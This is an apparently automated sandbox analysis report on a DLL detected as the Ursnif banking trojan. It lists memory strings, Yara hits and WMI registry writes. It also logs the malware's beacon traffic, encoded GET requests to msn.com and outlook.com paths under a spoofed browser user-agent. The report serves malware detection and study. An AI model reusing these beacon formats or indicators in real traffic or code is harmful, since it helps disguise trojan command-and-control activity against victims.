                      Source: loaddll32.exe, 00000000.00000003.484784411.0000000003519000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484484416.0000000001176000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.663941944.000000000359B000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.484571941.0000000001166000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.663859168.000000000117A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478128866.0000000004BB9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.656930982.00000000008FF000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.478075992.00000000008ED000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.657034849.0000000004C3B000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/en-us//api/modules/fetch"
                      Source: rundll32.exe, 00000003.00000003.700093416.0000000000894000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/mail/liopolo/BqQVObz8g5lnocL/rDmP1N8TTzvhY7vp6N/RS6H6xMUu/qA1CfJ9oDnQhRUYDGgyu/M
                      Source: loaddll32.exe, 00000000.00000003.484571941.0000000001166000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/mail/liopolo/M47eTWImwyNJIXk/bvBUnXDqSGJkSqnZ1W/IoQdQ6MHW/B7zE09Qn2ChgYQ2HLYH_/2
                      Source: rundll32.exe, 00000003.00000003.511182314.0000000000894000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4l
                      Source: loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmpString found in binary or memory: https://www.outlook.com/signup
                      Source: rundll32.exe, 00000003.00000003.567344794.00000000008EA000.00000004.00000001.sdmpString found in binary or memory: https://www.outlook.com/signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_
                      Source: loaddll32.exe, 00000000.00000002.769550335.0000000001102000.00000004.00000001.sdmpString found in binary or memory: https://www.outlook.com/signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS
                      Source: unknownDNS traffic detected: queries for: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/wy2L0fN2E5PVQV/dJuGUeMmesCePLL0l7Wgt/WGkNYevXDY_2B8SF/CdMZYMX0E7B4luP/Ul2jmINaYu2Q2Tpowu/zFWfPWe10/HWR9Tc92PXi2sPWtdN4v/UdHW73hHNRRgj93MpeR/gAwjHz21J0PRcDvLd3I609/yvRpibRLzjrjt/tNfBhMKC/cc7JRbI6tVdqBgZvAlBLjz4/UmIafwR6sLy9/c9juhd.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/M47eTWImwyNJIXk/bvBUnXDqSGJkSqnZ1W/IoQdQ6MHW/B7zE09Qn2ChgYQ2HLYH_/2FQQUDoZM2fDLMcKw_2/FKAo20C9iE_2FlWT_2Bfzo/Rp1YRopF97I_2/B8CxFQdR/_2BNrlSUvWcd0EwvOdX03BY/sLHqBgEIoN/l5xSyCjNwonJQFrna/xuhuk7iqStO6/LAN01N_2FT3/qYrzxcmDBjbOke/xPgut5GCh0/QPq7LLa.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/BqQVObz8g5lnocL/rDmP1N8TTzvhY7vp6N/RS6H6xMUu/qA1CfJ9oDnQhRUYDGgyu/MnijqTPatYoqwLU2Gjp/CUGc0n_2BeItdu5kr8poMa/AhSBnyUxBLy2z/WL6kh9Er/V_2FntCaBAYN2Q0pmQz73pS/plPX31iyVH/sliN48qRh7bzwYOXL/_2Bf1goPp5sf/LxXLhBSZnu3/MQi2YcecwkM/9zZah40u0/3pu.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/ytBZeomNqV/HSfS_2F75u1_2Bgzu/fw3T9nUGqtyA/MnMc49Ew1bU/TR75BNg3t5wK_2/FZ_2BhHpRHjaoiOWsJCdm/IP7BzqL3kfOIwEpd/0v6vAk1XTaQKS4Q/4t76RFSHOBJGuOI3un/dPzfZGf9x/VMluKaNPNp_2BEHsWys0/7w8R7Qn2JCyyYRXwFiA/UZytNi_2F_2BVoKUDorTiy/Fo.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/xrfnn2_2FjAWwzmSPV2sJmp/tknhXbcO6a/ZAGJ1q_2FdrKNOunT/MWqXv5zFFG9p/by8Zf_2FtJ3/xEG2AHiWNHzGMb/5U7AZq2hWTtx5Gp_2FLrT/Jtvmik5RsI3BKCJG/qiPKwJPTBUSBiQw/RY1j9J90egtogWV_2B/CgPW8RXFg/49h8H9fZxytN8Y5j4Ua3/YD4Lz_2BMKncbFniIjR/do3Cf1aCJb1FbLOESe_2B/MC.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.7:49749 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.7:49751 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.7:49771 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.124.210:443 -> 192.168.2.7:49772 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.223.66:443 -> 192.168.2.7:49773 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.7:49774 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.124.210:443 -> 192.168.2.7:49775 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.208.114:443 -> 192.168.2.7:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.7:49810 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.7:49812 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.7:49842 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.219.162:443 -> 192.168.2.7:49843 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.137.114:443 -> 192.168.2.7:49844 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.7:49845 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.219.162:443 -> 192.168.2.7:49846 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.214.82:443 -> 192.168.2.7:49847 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000003.477730310.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484405458.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484224135.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.483910009.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477283953.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484141352.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477436654.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.478270609.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.619486334.000000000321F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.528112034.000000000341B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.567583094.00000000049BD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.776401255.0000000004840000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.521826421.0000000004ABB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484353267.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477363484.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477795801.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484300889.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477552233.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.576475056.000000000331D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.483984504.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484055425.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477498453.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484848144.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477873003.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.774526618.00000000031A0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612038120.00000000048BF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4668, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4712, type: MEMORYSTR
                      Source: Yara matchFile source: 3.3.rundll32.exe.70a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.caa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.810000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.70a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.45794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.45794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.33ba31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.33ba31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.30da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.caa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6e4c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.c70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.30da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.64a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.64a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e4c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e4c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000003.427656191.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.391175894.00000000030D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.432941083.0000000000CA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.774318149.0000000003079000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.421383177.0000000000640000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.776217854.0000000004579000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.389669380.0000000000700000.00000040.00000001.sdmp, type: MEMORY
                      Source: loaddll32.exe, 00000000.00000002.768381910.00000000010AB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000003.477730310.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484405458.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484224135.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.483910009.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477283953.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484141352.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477436654.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.478270609.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.619486334.000000000321F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.528112034.000000000341B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.567583094.00000000049BD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.776401255.0000000004840000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.521826421.0000000004ABB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484353267.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477363484.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477795801.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484300889.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477552233.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.576475056.000000000331D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.483984504.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484055425.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477498453.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.484848144.0000000003598000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.477873003.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.774526618.00000000031A0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612038120.00000000048BF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4668, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4712, type: MEMORYSTR
                      Source: Yara matchFile source: 3.3.rundll32.exe.70a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.caa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.810000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.70a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.45794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.45794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.33ba31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.33ba31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.30da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.caa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6e4c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.c70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.30da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.64a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.64a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e4c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e4c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000003.427656191.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.391175894.00000000030D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.432941083.0000000000CA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.774318149.0000000003079000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.421383177.0000000000640000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.776217854.0000000004579000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.389669380.0000000000700000.00000040.00000001.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: 6yDD19jMIu.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 892 -s 636
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C21B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4D5600
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E518C9B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4FE8C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4D5600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E50D630
